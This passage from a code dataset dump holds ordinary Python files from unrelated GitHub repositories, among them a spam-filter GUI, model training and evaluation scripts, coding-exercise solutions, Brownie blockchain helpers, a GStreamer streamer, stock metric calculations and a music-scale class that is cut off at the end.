dpg.get_value('Input')\n \n # some spacing and separator\n dpg.add_spacing(count=6, parent=\"Primary Window\", tag=\"result_spacer_1\")\n dpg.add_separator(parent=\"Primary Window\", tag=\"result_separator\")\n dpg.add_spacing(count=6, parent=\"Primary Window\", tag=\"result_spacer_2\")\n \n # preprocess input string\n pre_processed_input_value = pre_process(input_value)\n \n # get predictions\n pred_text, pred_color = predict(pre_processed_input_value)\n \n # display predictions\n dpg.add_text(pred_text, color=pred_color, parent=\"Primary Window\", tag=\"result_text\")\n \n\n\ndpg.create_context()\n\n# loading the logo image\nwidth, height, channels, data = dpg.load_image(\"assets/logo_spamFilter.png\")\n\n# added tag to help identify this is the primary window\nwith dpg.window(label=\"Simple SMS Spam Filter\", tag=\"Primary Window\"):\n\n # displaying the image at the top\n with dpg.texture_registry(show=False):\n dpg.add_static_texture(width, height, data, tag=\"texture_tag\")\n\n # adding the image to the tag\n dpg.add_image(\"texture_tag\", indent=30)\n dpg.add_separator(label=\"separator\")\n dpg.add_spacing(count=12)\n \n # instructions\n dpg.add_text(\"Please enter an SMS message of your choice to check if it's spam or not\", color=[232, 163, 33])\n dpg.add_spacing(count=6)\n\n # add input text\n dpg.add_input_text(tag=\"Input\", label=\"Input\", width=415, default_value=\"Type Message Here!\")\n dpg.add_spacing(count=6)\n dpg.add_button(label=\"Check\", callback=check_spam)\n\n \n\ndpg.create_viewport(title=\"Simple SMS Spam Filter\", width=540, height=720)\n\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.set_primary_window(\"Primary Window\", True)\ndpg.start_dearpygui()\ndpg.destroy_context()","repo_name":"Nachimak28/sms_spam_filter_gui","sub_path":"spam_sms_identifier/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"25888923766","text":"import os\nimport json\nimport logging\nimport argparse\n\nimport megengine.distributed as dist\nimport megengine.functional as F\n\nimport model.net as net\nimport dataset.data_loader as data_loader\n\nfrom easydict import EasyDict\n\nfrom common import utils\nfrom common.manager import Manager\nfrom loss.losses import compute_losses, compute_metrics\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_dir', default='experiments/base_model', help=\"Directory containing params.json\")\nparser.add_argument('--restore_file', default='best', help=\"name of the file in --model_dir containing weights to load\")\n\n\ndef evaluate(model, manager):\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n\n # set model to evaluation mode\n model.eval()\n\n # compute metrics over the dataset\n if manager.dataloaders[\"val\"] is not None:\n # loss status and val status initial\n manager.reset_loss_status()\n manager.reset_metric_status(\"val\")\n for data_batch in manager.dataloaders[\"val\"]:\n # compute the real batch size\n bs = data_batch[\"img1\"].shape[0]\n # move to GPU if available\n data_batch = utils.tensor_mge(data_batch)\n\n data_batch[\"imgs\"] = F.concat([data_batch[\"img1\"] / 255.0, data_batch[\"img2\"] / 255.0], 1)\n # compute model output\n output_batch = model(data_batch)\n # compute all loss on this batch\n # loss = compute_losses(data_batch, output_batch, manager.params)\n metrics = {}\n metrics[\"EPE\"] = compute_metrics(data_batch, output_batch)\n if world_size > 1:\n # loss['total'] = F.distributed.all_reduce_sum(loss['total']) / world_size\n metrics['EPE'] = F.distributed.all_reduce_sum(metrics['EPE']) / world_size\n # manager.update_loss_status(loss, \"val\", bs)\n # compute all metrics on this batch\n\n manager.update_metric_status(metrics, \"val\", bs)\n # manager.print_metrics(\"val\", title=\"Val\", color=\"green\")\n\n # update data to tensorboard\n if rank == 0:\n # manager.writer.add_scalar(\"Loss/val\", manager.loss_status[\"total\"].avg, manager.epoch)\n # manager.logger.info(\"Loss/valid epoch {}: {}\".format(manager.epoch, manager.loss_status['total'].avg))\n\n for k, v in manager.val_status.items():\n manager.writer.add_scalar(\"Metric/val/{}\".format(k), v.avg, manager.epoch)\n # manager.logger.info(\"Metric/valid epoch {}: {}\".format(manager.epoch, v.avg))\n # For each epoch, print the metric\n manager.print_metrics(\"val\", title=\"Val\", color=\"green\")\n\n\ndef test(model, manager):\n # set model to evaluation mode\n model.eval()\n\n if manager.dataloaders[\"test\"] is not None:\n # loss status and test status initial\n manager.reset_loss_status()\n manager.reset_metric_status(\"test\")\n for data_batch in manager.dataloaders[\"test\"]:\n # compute the real batch size\n bs = data_batch[\"img1\"].shape[0]\n # move to GPU if available\n data_batch = utils.tensor_mge(data_batch)\n data_batch[\"imgs\"] = F.concat([data_batch[\"img1\"], data_batch[\"img2\"]], 1)\n # compute model output\n output_batch = model(data_batch)\n # compute all metrics on this batch\n metrics = {}\n\n # identity_batch = {\"flow_fw\": [F.zeros_like(data_batch[\"gyro_field\"])]}\n # metrics[\"I33\"] = compute_metrics(data_batch, identity_batch)\n\n # gyro_batch = {\"flow_fw\": [data_batch[\"gyro_field\"]]}\n # metrics[\"GyroField\"] = compute_metrics(data_batch, gyro_batch)\n\n metrics[\"EPE\"] = compute_metrics(data_batch, output_batch)\n\n if data_batch[\"label\"][0] == \"RE\":\n metrics[\"RE\"] = compute_metrics(data_batch, output_batch)\n elif data_batch[\"label\"][0] == \"Rain\":\n metrics[\"Rain\"] = compute_metrics(data_batch, output_batch)\n elif data_batch[\"label\"][0] == \"Dark\":\n metrics[\"Dark\"] = compute_metrics(data_batch, output_batch)\n elif data_batch[\"label\"][0] == \"Fog\":\n metrics[\"Fog\"] = compute_metrics(data_batch, output_batch)\n\n manager.update_metric_status(metrics, \"test\", bs)\n\n manager.print_metrics(\"test\", title=\"Test\", color=\"red\")\n\n # For each epoch, print the metric\n print(\"The average results are: \")\n manager.print_metrics(\"test\", title=\"Test\", color=\"red\")\n\n\nif __name__ == '__main__':\n # Load the parameters\n args = parser.parse_args()\n json_path = os.path.join(args.model_dir, 'params.json')\n assert os.path.isfile(json_path), \"No json configuration file found at {}\".format(json_path)\n with open(json_path) as f:\n params = EasyDict(json.load(f))\n # Only load model weights\n params.only_weights = True\n\n # Update args into params\n params.update(vars(args))\n\n # Get the logger\n logger = utils.set_logger(os.path.join(args.model_dir, 'evaluate.log'))\n\n # Create the input data pipeline\n logging.info(\"Creating the dataset...\")\n\n # Fetch dataloaders\n params.eval_type = 'test'\n dataloaders = data_loader.fetch_dataloader(params)\n\n # Define the model and optimizer\n model = net.fetch_net(params)\n\n # Initial status for checkpoint manager\n manager = Manager(model=model, optimizer=None, scheduler=None, params=params, dataloaders=dataloaders, writer=None, logger=logger)\n\n # Reload weights from the saved file\n manager.load_checkpoints()\n\n # Test the model\n logger.info(\"Starting test\")\n\n # Evaluate\n test(model, manager)\n","repo_name":"MegEngine/GyroFlow","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"27"} +{"seq_id":"20471712993","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def pairSum(self, head: Optional[ListNode]) -> int:\n lst = []\n while head:\n lst.append(head.val)\n head = head.next\n \n return max([lst[i]+lst[-1-i] for i in range(len(lst))])","repo_name":"seogudwns/LeetCode","sub_path":"2130-maximum-twin-sum-of-a-linked-list/2130-maximum-twin-sum-of-a-linked-list.py","file_name":"2130-maximum-twin-sum-of-a-linked-list.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"75045599750","text":"#!/usr/bin/env python\n\nimport crrlpy.models.rrlmod as rm\nimport pylab as plt\n\nsalg = rm.load_betabn('7d1', '1d0', other='')\ndata = rm.make_betabn('7d1', '1d0', 'alpha', nmax=1000, other='')\n\nplt.plot(salg[100:1000,0], salg[100:1000,1], 'b-')\nplt.plot(data[0,100:1000], data[1,100:1000], 'ro')\n\nplt.show()","repo_name":"astrofle/CRRLpy","sub_path":"crrlpy/models/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"29395435609","text":"from __future__ import absolute_import, division, print_function\nimport importlib\n# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom keras.callbacks import TensorBoard\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport atexit\nimport argparse\nimport os\nimport sys\nimport logging\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\"module.name\", \"model.py\")\nModel = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(Model)\n\nrun_title = ''\n\nparser = argparse.ArgumentParser(description='Train on flower images ')\nparser.add_argument(\n '--run_title', '-rt',\n default='none',\n help='Provide a run name. Default run data stored as none'\n)\nparser.add_argument(\n '--batch_size', '-bs',\n default=4,\n help='Provide a batch_size, defaults to 16'\n)\nparser.add_argument(\n '--load_model', '-lm',\n default='none',\n help='Load the model from its file path'\n)\nparser.add_argument(\n '--tf_logs', '-tfl',\n default='false',\n help='Set as true/yes or false/no for logs or no logs from warnings/errors'\n)\nargs = parser.parse_args()\n\nlogging.getLogger('tensorflow').disabled = (False if args.tf_logs in ['True','true','yes','Yes'] else True)\n\n# Local time in form yyyy:mm:dd:hh:mm:ss\nlt = time.localtime(time.time())\nlocaltime = [lt[1],lt[2] , lt[3] , lt[4] , lt[5]]\nlocaltime = ['{:02d}'.format(a) for a in localtime]\nlocaltime = str(lt[0]) + '-' + ('-').join(localtime)\nprint(\"Local Time: \", localtime)\ndel lt\n\nlogpath = \"json-logs/log-\" + localtime +\".json\"\n\n# Keras Callback function that writes to json file named by initialization of main.py\nclass writeToJson(tf.keras.callbacks.Callback):\n def __init__(self):\n self.history = dict(loss=[],val_loss=[],acc=[],val_acc=[])\n f=open(logpath,\"w+\")\n f.write(\"[]\")\n f.close()\n self.epochNum = 0\n def on_epoch_end(self, epoch, logs={}):\n self.epochNum += 1\n for key in self.history:\n self.history[key] = logs.get(key)\n with open(logpath, \"a\") as f:\n size=f.tell()\n f.truncate(size-1)\n #f=open(self.logpath,\"a+\")\n if f.tell() > 2:\n f.write(\",\")\n f.write(\"{\\\"loss\\\":\\\"%f\\\",\\\"val_loss\\\":\\\"%f\\\",\\\"acc\\\":\\\"%f\\\",\\\"val_acc\\\":\\\"%f\\\"}\" % (logs.get('loss'),logs.get('val_loss'),logs.get('acc'),logs.get('val_acc')))\n f.write(\"]\")\n f.close()\nwrite_to_json = writeToJson()\n\n# Handle preemptive closes\ndef closeJsonLog():\n f= open(logpath,\"a+\")\n size=f.tell()\n if size > 2:\n f.truncate(size-1)\n f.write(\"]\")\n f.close()\natexit.register(closeJsonLog)\n\n# Training Function\ndef train():\n # Data Augmentation, provides more varied data for model to train on, preventing overfitting\n datagen = keras.preprocessing.image.ImageDataGenerator(\n rescale=1/255,\n validation_split=0.2,\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n horizontal_flip=True)\n batch_size = int(args.batch_size)\n print(\"Loading Training Dataset\")\n tsize = 1\n X_train = datagen.flow_from_directory('flower_photos/', class_mode='categorical', batch_size=batch_size,target_size=(tsize,tsize), subset='training', seed=2)\n print(\"Loading Validation Dataset\")\n X_val = datagen.flow_from_directory('flower_photos/', class_mode='categorical', batch_size=batch_size,target_size=(tsize, tsize), subset='validation', seed=2)\n\n\n labels = (X_train.class_indices)\n print(\"Labels\", labels)\n print(\"Input Shape\", X_train[0][0].shape)\n\n # OTHERS\n filepath = \"models-v0/2cnnmodel-{epoch:02d}-{val_acc:.5f}.hdf5\"\n check_point = tf.keras.callbacks.ModelCheckpoint(filepath, monitor='val_loss', verbose=0, save_best_only=False, save_weights_only=False, mode='auto', period=2)\n\n optimizer = tf.keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\n red_lr= tf.keras.callbacks.ReduceLROnPlateau(monitor='val_acc',patience=3,verbose=1,factor=0.2)\n\n # TESNORBOARD LOGGING\n logdir = 'logs/' + args.run_title\n tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)\n\n # ARCHITECTURE\n model = Model.unitTestModel()\n\n History = model.fit_generator(\n X_train,\n steps_per_epoch=len(X_train)/4,\n validation_data = X_val,\n epochs=200,\n callbacks=[check_point,red_lr,write_to_json,tensorboard_callback])\n plt.plot(History.history['loss'])\n plt.plot(History.history['val_loss'])\n plt.title('Model Loss')\n plt.ylabel('Loss')\n plt.xlabel('Epochs')\n plt.legend(['train', 'test'])\n #plt.show()\n\n plt.plot(History.history['acc'])\n plt.plot(History.history['val_acc'])\n plt.title('Model Accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epochs')\n plt.legend(['train', 'test'])\n model.save('2xcnnmodel-flowersv0.h5')\n####-----####\nif __name__ == '__main__':\n train()\n","repo_name":"StoneT2000/Practice","sub_path":"Python/ML/Neural Networks/FlowerClassification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12779647239","text":"import sys\nfrom collections import deque\nsys.stdin = open('curiculum', 'r')\nv = int(input())\ntimes = [0]*(v+1)\nmxCnt = [0] * (v + 1)\nindegree = [0]*(v+1)\ngraph = [[] for _ in range(v+1)]\n\nfor i in range(1, v + 1):\n lst = list(map(int, input().split()))\n first = lst.pop(0)\n if first == -1:\n continue\n else:\n times[i] = first\n for data in lst:\n if data == -1:\n break\n else:\n indegree[i] += 1\n graph[data].append(i)\nprint('ind', indegree)\n\nfor i in range(v+1):\n mxCnt[i] = times[i]\n\ndef topology_sort():\n edges = deque()\n for i in range(1, v+1):\n if indegree[i] == 0:\n edges.append(i)\n # pre = 0\n while edges:\n now = edges.popleft()\n # result.append(times[now] + pre)\n # pre = times[now]\n for i in graph[now]:\n mxCnt[i] = max(mxCnt[i], mxCnt[now] + times[i])\n indegree[i] -= 1\n if indegree[i] == 0:\n edges.append(i)\n\n\ntopology_sort()\n# print('ind', indegree)\nprint('times', times)\nprint('graph', graph)\nprint(mxCnt)\n\n","repo_name":"ggaem97/study","sub_path":"2022-01-10/curicul.py","file_name":"curicul.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7697884851","text":"#define datos de entrada\nprint(\"Ejercicio 17\")\n#datos de entrada\npaqueteA=\"A: 1 televisor, 1 modular, 3 pares de zapatos, 5 camisas y 5 pantalones\"\npaqueteB=\"B: 1grabadora, 3 pares de zapatos, 5 camisas y 5 pantalones\"\npaqueteC=\"C: 2 pares de zapatos, 3 camisas y 3 pantalones\"\npaqueteD=\"D: 1 par de zapatos, 2 pares de camisas y 3 pares de pantalones\"\nTrecibido= int(input(\"Ya llego diciembre, coloque Ud. el monto recibido:\"))\nif Trecibido >= 50000 :\n podracomprar = paqueteA\nelif Trecibido <50000 and Trecibido >= 20000 :\n podracomprar = paqueteB\nelif Trecibido <20000 and Trecibido >= 10000 :\n podracomprar = paqueteC\nelif Trecibido <10000 :\n podracomprar = paqueteD\nprint(\"Ud. podra comprar el paquete\", podracomprar)","repo_name":"hubert-cyber/EjerciciosEnPython","sub_path":"Ejercicio17.py","file_name":"Ejercicio17.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43687195890","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\nfor i in range(1, 2):\n\n n, pw = map(int, input().split())\n pw = str(pw)\n stack = [pw[0]]\n\n for j in range(1, len(pw)):\n if len(stack) and stack[-1] == pw[j]:\n stack.pop()\n else:\n stack.append(pw[j])\n\n print(f\"#{i} {int(''.join(stack))}\")\n","repo_name":"bmlsj/Solve-algorithms","sub_path":"SWEA/SW 문제해결 기본/[10DAY]1234.비밀번호.py","file_name":"[10DAY]1234.비밀번호.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33305719133","text":"from brownie import accounts, network, config, MockV3Aggregator\nfrom web3 import Web3\n\n\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork-dev\"]\n\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-local\", \"ganache-local_bis\"]\n\nPRIVATE_BLOCKCHAIN_ENVIRONMENTS = [\"Hmz-private-chain\"]\n\nDECIMALS = 10\n\nSTARTING_PRICE = 4000\n\n\ndef get_account():\n if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n # print(*accounts)\n return accounts[0]\n elif network.show_active() in PRIVATE_BLOCKCHAIN_ENVIRONMENTS:\n return accounts.add(config[\"wallets\"][\"from_key\"])\n return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ndef get_pricefeed():\n if network.show_active() in FORKED_LOCAL_ENVIRONMENTS:\n price_feed_address = config[\"networks\"][network.show_active()][\n \"eth_usd_price_feed\"\n ]\n return price_feed_address\n print(\"Deploying Mocks...\")\n account = get_account()\n if len(MockV3Aggregator) <= 0:\n mock_aggregator = MockV3Aggregator.deploy(\n DECIMALS, Web3.toWei(STARTING_PRICE, \"ether\"), {\"from\": account}\n )\n print(\"Mocks Deployed!\")\n price_feed_address = MockV3Aggregator[\n -1\n ].address # Contract[-1] gets the latest deployed version of a contract\n return price_feed_address\n","repo_name":"HamzaKarh/betting_game","sub_path":"scripts/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72623023113","text":"import cv2\n\n# WORKING: cap = cv2.VideoCapture(\"shmsrc socket-path=/tmp/foo ! video/x-raw, format=BGR ,width=1920,height=1080,framerate=30/1 ! videoconvert ! video/x-raw, format=BGR ! appsink\")\n\nfps = 30.\nframe_width = 1920\nframe_height = 1080\n\n# Define the source as shared memory (shmsrc) and point to the socket. !\n# Set the caps (raw (not encoded) frame video/x-raw, format as BGR or RGB (opencv format of grabbed cameras)) and define the properties of the camera !\n# And sink the grabbed data to the appsink\ncap = cv2.VideoCapture(\"shmsrc socket-path=/tmp/foo ! video/x-raw, format=BGR ,width=1920,height=1080,framerate=30/1 ! appsink\")\n\nif not cap.isOpened():\n print(\"Cannot capture from camera. Exiting.\")\n quit()\n\n\ngst_str_rtp = \"appsrc ! videoconvert ! x264enc noise-reduction=10000 tune=zerolatency byte-stream=true threads=4 \" \\\n \" ! h264parse ! mpegtsmux ! rtpmp2tpay ! udpsink host=127.0.0.1 port=5000\"\n\n# Create videowriter as a RTP sink\nout = cv2.VideoWriter(gst_str_rtp, 0, fps, (frame_width, frame_height), True)\n\nwhile True:\n\n ret, frame = cap.read()\n #\n if ret == False:\n break\n\n out.write(frame)\n\n\n cv2.imshow(\"SHM frame\",frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# gst-launch-1.0 v4l2src ! x264enc ! shmsink socket-path=/tmp/foo sync=true wait-for-connection=false shm-size=10000000\n\n# gst-launch-1.0 shmsrc socket-path=/tmp/foo ! h264parse ! avdec_h264 ! videoconvert ! ximagesink\n\n# gst-launch-1.0 shmsrc socket-path=/tmp/foo ! video/x-raw, format=BGR ,width=1920,height=1080,framerate=30/1 ! videoconvert ! ximagesink\n","repo_name":"mad4ms/python-opencv-gstreamer-examples","sub_path":"gst_shm_to_rtp.py","file_name":"gst_shm_to_rtp.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"27"} +{"seq_id":"6870257845","text":"#!/usr/local/bin/python3\n\n# N天周期的移动平均EMA的计算公式:EMA = [当天的收盘价×2 + 前一天的EMA×(N-1)] / (N+1)\n# 1. ./calculateMetrics.py [ -f folderName / -s stockName ]\n# EMA21、EMA60、EMA200\n# STD21、STD60、STD200\n# VAR21、VAR60、VAR200\n# (the std/var for the first N days is marked as 0)\n# \n# 2. ./pickStockByDate -d 20001030 => stocks_date.csv\n#\n# 3. selecting stocks => output stocks_data.csv\n\n\n\nimport math\nimport optparse\nimport os\nimport shutil\n\nimport metricsIo\nimport buffedCalculate\nimport utility\n\ndef calculateStdVar(closeList, varN):\n if len(closeList) < varN:\n return []\n\n buffer = closeList[:varN]\n resultStd = [0] * (varN-1)\n resultVar = [0] * (varN-1)\n\n calculator = buffedCalculate.Calculator(buffer)\n resultStd.append(calculator.getStdDeviation())\n resultVar.append(calculator.getVariance())\n\n i = varN\n while i < len(closeList):\n buffer.pop(0)\n buffer.append(closeList[i])\n calculator = buffedCalculate.Calculator(buffer)\n resultStd.append(calculator.getStdDeviation())\n resultVar.append(calculator.getVariance())\n i += 1\n\n return [resultStd, resultVar]\n\n\ndef calculateEma(closeList, emaN):\n if len(closeList) < 1:\n return [] # warning reported in csvio\n assert(emaN > 1)\n\n resultList = [closeList[0]]\n\n i = 1\n while i < len(closeList):\n ema = (closeList[i] * 2 + resultList[i-1] * (emaN-1) ) / (emaN + 1)\n resultList.append(ema)\n i += 1\n\n return resultList\n \n\nratioNumberList = [21, 60, 200]\nvarNumberList = [21, 60, 200]\ntitleList = ['date', 'open', 'high', 'low', 'close', 'volume', 'turnover']\ndef runOnStock(stockFile, outputFolderName):\n if not stockFile.endswith('.txt'):\n return\n\n inputFileName = os.path.basename(os.path.normpath(stockFile)).replace('.txt', '')\n outputFileName = os.path.join(outputFolderName, inputFileName)\n\n readObject = metricsIo.Reader(stockFile)\n emaList = []\n stdList = []\n varList = []\n\n for ratioN in ratioNumberList:\n emaResult = calculateEma(readObject.getCloseList(), ratioN)\n if len(emaResult) == 0:\n #print('Warning: ema calculation error for file \\'{}\\''.format(stockFile))\n return # calculation error, abort for this file\n\n stdVarResult = calculateStdVar(readObject.getCloseList(), ratioN)\n if len(stdVarResult) != 2 or len(stdVarResult[0]) == 0 or len(stdVarResult[1]) == 0:\n #print('Warning: std/var calculation error for file \\'{}\\''.format(stockFile))\n return # calculation error, abort for this file\n\n emaList.append(emaResult)\n stdList.append(stdVarResult[0])\n varList.append(stdVarResult[1])\n \n writeObject = metricsIo.Writer(outputFileName, titleList, ratioNumberList)\n writeObject.writeContent(readObject.getAllList(), emaList + stdList + varList)\n\n\ndef run():\n parser = optparse.OptionParser()\n parser.add_option('-i', '--input-stock', action='store', dest='inputStock',\n help='Expecting folders with stock name under this folder or a txt stock file', default=None)\n parser.add_option('-o', '--output-folder', action='store', dest='outputFolder',\n help='The calcualted matrics will be stored in the folder', default=None)\n parser.add_option('-f', action='store_true', dest='doOverwrite')\n\n options, args = parser.parse_args()\n\n inputStock = options.inputStock\n outputFolder = options.outputFolder\n doOverwrite = options.doOverwrite\n\n if inputStock == None:\n print('Error: no stock path not stock file specified, please run --help for more information')\n exit(-1)\n\n outputFolderName = \"\"\n if outputFolder == None:\n outputFolderName = utility.getTimeStampedOutPutName()\n else:\n outputFolderName = outputFolder\n\n if os.path.exists(outputFolderName):\n if doOverwrite:\n shutil.rmtree(outputFolderName)\n else:\n print('Error: \\'{}\\' folder exists already, you can use -f option to allow overwrite'.format(outputFolderName))\n exit(-1)\n os.makedirs(outputFolderName)\n\n if os.path.isfile(inputStock):\n runOnStock(inputStock, outputFolderName)\n elif os.path.isdir(inputStock):\n for stock in os.listdir(inputStock):\n stockDir = os.path.join(inputStock, stock)\n if os.path.isfile(stockDir):\n runOnStock(os.path.join(inputStock, stock), outputFolderName)\n print('.', end='', flush=True)\n print()\n else:\n print('Error: {} is neither a stock folder nor a stock file'.format(inputStock))\n exit(-1)\n\n\n\ndef main():\n utility.printStartTimeStamp()\n\n run()\n\n utility.printEndTimeStamp()\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"sims1/babaproj","sub_path":"pythonProject/calculateMetrics.py","file_name":"calculateMetrics.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8478151630","text":"import pandas as pd\nfrom IPython import embed\n\nCLUSTERS_PATH = \"../data/clustering1.txt\"\n\n\nclass Kruskal:\n def __init__(self, edges, num_clusters):\n self.edges = edges.sort_values(by=\"distance\")\n self.nodes = edges[\"from\"].append(edges[\"to\"]).unique()\n self.num_clusters = num_clusters\n\n def find_clusters(self):\n for i, row in self.edges.iterrows():\n if len(self.nodes) <= self.num_clusters:\n break\n\n from_val = row[\"from\"]\n to_val = row[\"to\"]\n if from_val != to_val:\n self.nodes = [node for node in self.nodes if node != from_val]\n\n self.edges.loc[self.edges[\"from\"] == from_val, \"from\"] = to_val\n self.edges.loc[self.edges[\"to\"] == from_val, \"to\"] = to_val\n return (\n self.edges.loc[self.edges[\"from\"] != self.edges[\"to\"]]\n .groupby([\"from\", \"to\"])[\"distance\"]\n .min()\n )\n\n\ndef main():\n edges = pd.read_csv(CLUSTERS_PATH, sep=\" \")\n k = Kruskal(edges, 4)\n clusters = k.find_clusters()\n print(f\"clusters {clusters}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oli5679/StanfordAlgorithms","sub_path":"course_3/scripts/ps_2.py","file_name":"ps_2.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42045120177","text":"#Mathew Thomas - N15690387\n#Music Software Projects, NYU Courant, Fall 2016\n#Implementation of Pythagorean Dodecaphonic Scale\n\nclass pythagorean:\t\t\t\t\t#Class implementing PythagDodec scale\n\t\n\tdef __init__(self, intn, bf):\n\t\n\t\tif (intn==0):\n\t\t\tself.base = bf\n\t\t\tself.intn = float(intn)\n\t\t\tself.degree = 0\n\t\t\tself.let = \"\"\n\t\t\tself.type = \"\"\n\t\t\tself.num = \"\"\n\t\t\tself.denom = \"\"\n\t\t\tself. factor = \"\"\n\t\t\tself.intfreq = \"\"\n\t\t\tself.octave = \"\"\n\t\t\tself.octfact = \"\"\n\t\t\tself.newnum = \"\"\n\t\t\tself.newdenom = \"\"\n\t\t\tself.factoctadj = 1.0\n\t\t\tself.finfreq = float(bf)\n\t\t\tself.filename = \"\"\n\t\t\t'''self.stringoctadj = \"\\\"\" + str(Fraction(1,1))+\"\\\"\"\n\t\t\tself.cents = 0'''\n\n\t\telif (intn<0):\n\t\t\tself.base = bf\n\t\t\tself.intn = float(intn)\n\t\t\tself.degree = 0\n\t\t\tself.let = \"\"\n\t\t\tself.type = \"\"\n\t\t\tself.num = float(2) ** (intn * -1)\n\t\t\tself.denom = float(3) ** (intn * -1)\n\t\n\t\t\tself.factor = float(self.num) / float(self.denom)\n\n\t\t\tself.intfreq = float(self.base) * float(self.factor)\n\t \n\t\t\tself.octave = float(self.lasttpowerof2(self.intfreq,self.base))\n\t\n\t\t\tself.octfact = float(2**(-1*self.octave))\n\n\t\t\tself.newnum = self.num * self.octfact\n\t\t\tself.newdenom = self.denom\n\n\t\t\tself.factoctadj = float(self.newnum)/float(self.newdenom)\n\t\t\n\t\t\tself.finfreq = self.hz()\n\t\t\tself.filename = \"\"\n\t\t\n\t\t\t'''self.stringoctadj = self.get_interval_ratio()\n\t\t\tself.cents = int(round(abs(1200 * mp.log(self.factoctadj,2))))'''\n\t\t\t\n\t\telse :\n\t\t\tself.base = bf\n\t\t\tself.intn = float(intn)\n\t\t\tself.degree = 0\n\t\t\tself.let = \"\"\n\t\t\tself.type = \"\"\n\t\t\tself.num = float(3) ** intn\n\t\t\tself.denom = float(2) ** intn\n\t\n\t\t\tself.factor = float(self.num) / float(self.denom)\n\n\t\t\tself.intfreq = float(self.base) * float(self.factor)\n\t \n\t\t\tself.octave = float(self.lasttpowerof2(self.intfreq,self.base))\n\t\n\t\t\tself.octfact = float(2**self.octave)\n\n\t\t\tself.newnum = self.num \n\t\t\tself.newdenom = self.denom * self.octfact\n\n\t\t\tself.factoctadj = float(self.newnum)/float(self.newdenom)\n\t\t\n\t\t\tself.finfreq = self.hz()\n\t\t\tself.filename = \"\"\n\t\t\n\t\t\t'''self.stringoctadj = self.get_interval_ratio()\n\t\t\tself.cents = int(round(abs(1200 * mp.log(self.factoctadj,2))))'''\n\t\t\t\n\tdef __repr__(self):\n\t\treturn '{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n\\n'.format(self.degree,self.intn,self.num,self.denom,self.factor,self.intfreq,self.octave,self.octfact,self.newnum,self.newdenom,self.factoctadj,self.finfreq,self.let,self.type)\n\n\tdef lasttpowerof2(self,intfreq,base):\n\t\ti = 0\n\t\tif intfreq>base : \n\t\t\twhile(baseintfreq):\n\t\t\t\tbase = float(base)/2;\n\t\t\t\ti = i-1;\n\t\t\t\n\t\t\t\t\t\n\t\treturn i\n\t\n\t'''def get_interval_ratio(self):\n\t\ty = (float(self.denom) * float(self.octfactor))\n\t\tx = float(self.num)/float(y)\n\t\treturn x'''\n\n\tdef hz(self):\n\t\tx = self.factoctadj * self.base\n\t\treturn x\n\ndef getKey(meantone):\t\t\t\t#Obtains the key for sorting the scale\n\treturn meantone.finfreq\n\ndef dodec(bf,filenameDict):\t\t\t\t\t\t\t#generates pythagorean dodecaphonic list\n\t\n\n\tLetterDict = {0 : \"C\", 1 : \"Db/C#\", 2 : \"D\", 3 : \"Eb/(D#)\", 4 : \"E\", 5 : \"F\", 6 : \"Gb/F#\", 7 : \"Gb/F#\", 8 : \"G\", 9 : \"Ab/G#\", 10 : \"A\", 11 : 